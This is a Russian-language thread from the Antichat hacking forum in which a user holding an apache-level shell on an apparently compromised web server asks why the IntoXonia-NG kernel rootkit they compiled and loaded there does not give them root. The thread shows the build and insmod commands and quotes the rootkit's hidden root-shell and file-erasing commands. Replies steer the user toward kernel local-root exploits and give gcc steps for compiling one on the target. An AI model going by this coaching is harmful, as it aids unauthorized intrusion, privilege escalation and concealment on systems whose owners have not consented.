Форум АНТИЧАТ - Как правильно воспользоваться руткитом?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)

- - Как правильно воспользоваться руткитом? (https://forum.antichat.xyz/showthread.php?t=61929)

Как правильно воспользоваться руткитом?

Моя цель получит root

Код:

Software: Apache/2.0.52 (Red Hat). PHP/4.3.9

uname -a: Linux ******** 2.6.9-55.0.9.ELsmp #1 SMP Tue Sep 25 02:16:15 EDT 2007 x86_64

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

Опишу все что делал - подробно:
В качестве Руткита выбрал IntoXonia-NG rootkit v.0.2 by _4epen & ShadOS.
После команды:

Код:

tar xzvf itx-ng-0.2-rc1.tar

получил:

Код:

 intoxonia/

 intoxonia/Makefile

 intoxonia/hfiles.c

 intoxonia/tricks.c

 intoxonia/nethide.c

 intoxonia/tricks.h

 intoxonia/funces.c

 intoxonia/ixinit.c

 intoxonia/funces.h

 intoxonia/README 

 intoxonia/scalls.h

 intoxonia/policy.h

 intoxonia/policy.c  

 intoxonia/select.c 

 intoxonia/tofile.c

 intoxonia/checks.c

 intoxonia/execve.c

 intoxonia/checks.h

 intoxonia/README-RU-UTF8 

 intoxonia/proces.c

 intoxonia/AUTHORS 

 intoxonia/tofile.h

 intoxonia/select.h 

 intoxonia/netwrk.c 

 intoxonia/netwrk.h

 intoxonia/option.h

 intoxonia/ChangeLog 

 intoxonia/COPYING

 intoxonia/TODO

Файл option.h редактировать не стал и оставил все по умолчанию.
Далее командой:

Код:

make

Получаю:

Код:

make -C /lib/modules/2.6.9-55.0.9.ELsmp/build SUBDIRS=/home/httpd/html/afam/gallery/tmp/intoxonia

  make[1]: Entering directory `/usr/src/kernels/2.6.9-55.0.9.EL-smp-x86_64'

    LD      /home/httpd/html/afam/gallery/tmp/intoxonia/built-in.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/checks.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/funces.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/execve.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/hfiles.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/netwrk.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/policy.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/proces.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/select.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/tofile.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/tricks.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/nethide.o

    CC [M]  /home/httpd/html/afam/gallery/tmp/intoxonia/ixinit.o

  make[1]: Leaving directory `/usr/src/kernels/2.6.9-55.0.9.EL-smp-x86_64'

Код:

make load

Результат:

Код:

insmod itx.ko

Далее выполняю команду:

Код:

/control auth itx

и ничего :confused: Подскажите что не так делал, и что нужно сделать...
Это мой первый опыт, так что по возможности обьясните доходчиво.

а для чего тебе нужен руткит?

может он перепутал руткит со сплойтом, дающем права рута?

Судя по цели, именно перепутал. А потому смотрим:
Что такое руткит:
_http://ru.wikipedia.org/wiki/Rootkit
_http://www.computerbild.ru/?did=16_919

Для поднятия прав до root в 2.6.9 используем:
_http://www.live.dsip.net/index.php?showtopic=1472

PS Вообще, всвязи с выходом сего (_http://www.milw0rm.com/exploits/5092) о том, что подняться до root`а нужно сплойтом (а не руткитом) не знает только запершийся в четырех стенах. Куда не плюнь - всюду его обсуждают..

Всё зависит от того, что ты хотел получить. Инструмент есть, голова есть (?) - осталось понять как им воспользоваться. Вспоминаем басню про мартышку и очки. Улыбнуло. Удивительно как он вообще insmod смог сделать =))))

Блин я же сказал что это мой первый опыт...
Цитирую файл README-RU:

Код:

11. Функции немедленного действия

---------------------------------



К этой категории относятся команды получения прав рута, смена UID и GID процесса и

секьюрное удаление файлов. Чтобы получить права суперпользователя, введи:



 # /control rootme

 

Результатом выполнения этой команды будет запуск /bin/sh с правами рута.

Чтобы принудительно сменить UID и GID процесса с идентификатором pid, есть две команды:



 # /control setuid pid uid

 # /control setgid pid uid

 

Защищенное удаление файла достигается следующей командой:



 # /control erase /file

 

Все эти функции также не будут работать без авторизации :)

Здесь четко написано что можно получить права суперпользователя, но что-то не получаеться...
To MacTep Спасибо за ответ, а что это - http://www.milw0rm.com/exploits/5092 подойдет для моей версии?

Это после установки руткита, секретные команды для хакера, его установившего, которые позволяют ему быстро повысить привелегии...

Это сплойт для поднятия прав до рута для linux kernel с версии 2.6.17 до версии 2.6.24. Патч уже опубликован, но мало кто его использовал.

Для твоего случая это не подойдет. Ядро атакуемой тобой системы 2.6.9.

Всем спасибо, из всей дискуссии я понял что мне просто нужен сплоит на 2.6.9
Кроме этого http://www.live.dsip.net/index.php?showtopic=1472 еще что то есть?

Раскажите пожалуйста как правильно воспользоваться данным http://www.live.dsip.net/index.php?showtopic=1472 сплоитом, как скомпилировать его на серваке...

Там 2 файла. создаешь file1.c и file2.c , рассовываешь код эксплоита в эти файл, далее
gcc file1.c -o file1
gcc file2.c -o file2
Но я не уверен, что это даст тебе root`а , выдержка из описания:

Цитата:

3. Размеры таблиц в файле nls_ascii.c некорректно установлены в 128 вместо 256, что может позволить злоумышленнику вызвать переполнение буфера и аварийно завершить работу ядра.

А самого шелл-кода то в эксплоите нету =(

Потому что это Poc-код

Подскажите пожалуйста кто может что такое POC-код, неоднакратно встречал, но не вдумывался в значение, и какой либо сплоит на linux 2.6.9

http://en.wikipedia.org/wiki/Proof_of_concept